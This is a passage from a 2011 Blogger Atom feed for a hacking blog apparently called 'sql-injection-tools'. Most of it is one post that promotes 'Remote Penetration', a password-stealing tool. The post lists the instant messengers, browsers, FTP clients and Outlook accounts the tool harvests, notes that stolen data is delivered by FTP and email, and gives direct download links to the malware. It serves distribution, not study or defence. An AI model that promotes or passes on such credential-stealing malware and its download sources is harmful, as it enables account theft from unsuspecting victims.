&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/u2YkrZIk1hIHkDRaCiIyHiWn6l4/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/u2YkrZIk1hIHkDRaCiIyHiWn6l4/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/u2YkrZIk1hIHkDRaCiIyHiWn6l4/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/u2YkrZIk1hIHkDRaCiIyHiWn6l4/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~4/4cBOUtZrMDM" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sql-injection-tools.blogspot.com/feeds/1966325692664903283/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sql-injection-tools.blogspot.com/2011/03/all-in-one.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/1966325692664903283?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/1966325692664903283?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~3/4cBOUtZrMDM/all-in-one.html" title="ALL IN ONE" /><author><name>CardingPower</name><uri>http://www.blogger.com/profile/17368275144743699486</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>1</thr:total><feedburner:origLink>http://sql-injection-tools.blogspot.com/2011/03/all-in-one.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A08CQHY4fSp7ImA9Wx9aGEo.&quot;"><id>tag:blogger.com,1999:blog-4252702633268366782.post-1883256382972868295</id><published>2011-03-11T13:44:00.001-08:00</published><updated>2011-03-11T13:44:21.835-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-03-11T13:44:21.835-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Password Stealers" /><title>REMOTE PENETRATION:</title><content type="html">Remote penetration was developed by hackhound.org and is a great stealer with ftp and email delivery.&lt;br /&gt;
It Currently steals:&lt;br /&gt;
&lt;ul style="margin-bottom: 0pt; margin-top: 0pt;"&gt;&lt;li&gt;Trillian&lt;/li&gt;
&lt;li&gt;Pidgin and Gaim&lt;/li&gt;
&lt;li&gt;PaltalkScene&lt;/li&gt;
&lt;li&gt;Digsby&lt;/li&gt;
&lt;li&gt;Live Messenger&lt;/li&gt;
&lt;li&gt;MSN Messenger&lt;/li&gt;
&lt;li&gt;AIM 6.xx (Private Version only)&lt;/li&gt;
&lt;li&gt;Miranda&amp;nbsp; (Private Version only)&lt;/li&gt;
&lt;li&gt;Google Talk (Private Version only)&lt;span class="bbc_color" style="color: yellow;"&gt;(NEW)&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;Firefox 2.xx - 3.xx&lt;/li&gt;
&lt;li&gt;IE6&lt;/li&gt;
&lt;li&gt;IE7 - 8&lt;/li&gt;
&lt;li&gt;Filezilla&lt;/li&gt;
&lt;li&gt;Smart FTP&lt;/li&gt;
&lt;li&gt;FlashFXP&lt;/li&gt;
&lt;li&gt;CoreFTP&lt;/li&gt;
&lt;li&gt;NO-IP&lt;/li&gt;
&lt;li&gt;DynDNS&lt;/li&gt;
&lt;li&gt;Outlook&lt;/li&gt;
&lt;li&gt;CamFrog &lt;span class="bbc_color" style="color: yellow;"&gt;(NEW)&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;Custom CD-Key Grabber (Input own path to key you want to grab)&lt;/li&gt;
&lt;/ul&gt;&lt;img alt="" src="http://img25.imageshack.us/img25/8290/mainscreenshotu.gif" /&gt;&lt;br /&gt;
DOWNLOADS:&lt;br /&gt;
&lt;a href="http://hackhound.org/forum/index.php?action=dlattach;topic=10046.0;attach=7870"&gt;RemotePenetration v160.rar&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://hackhound.org/forum/index.php?action=dlattach;topic=10046.0;attach=11120"&gt;Remote Penetration v2.1.rar&lt;/a&gt;&lt;br /&gt;
download both versions here: &lt;a href="http://hackhound.org/forum/index.php?topic=10046.0" target="_self"&gt;http://hackhound.org/forum/index.php?topic=10046.0&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4252702633268366782-1883256382972868295?l=sql-injection-tools.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/O0-2xV77Cv50MviXln5SyNjhTAQ/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/O0-2xV77Cv50MviXln5SyNjhTAQ/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/O0-2xV77Cv50MviXln5SyNjhTAQ/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/O0-2xV77Cv50MviXln5SyNjhTAQ/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~4/s2PB7OJVWf8" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sql-injection-tools.blogspot.com/feeds/1883256382972868295/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sql-injection-tools.blogspot.com/2011/03/remote-penetration.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/1883256382972868295?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/4252702633268366782/posts/default/1883256382972868295?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Ksecurity-teamSqlInjectionwebHackingwebSecurity/~3/s2PB7OJVWf8/remote-penetration.html" title="REMOTE PENETRATION:" /><author><name>CardingPower</name><uri>http://www.blogger.com/profile/17368275144743699486</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><thr:total>1</thr:total><feedburner:origLink>http://sql-injection-tools.blogspot.com/2011/03/remote-penetration.html</feedburner:origLink></entry></feed>

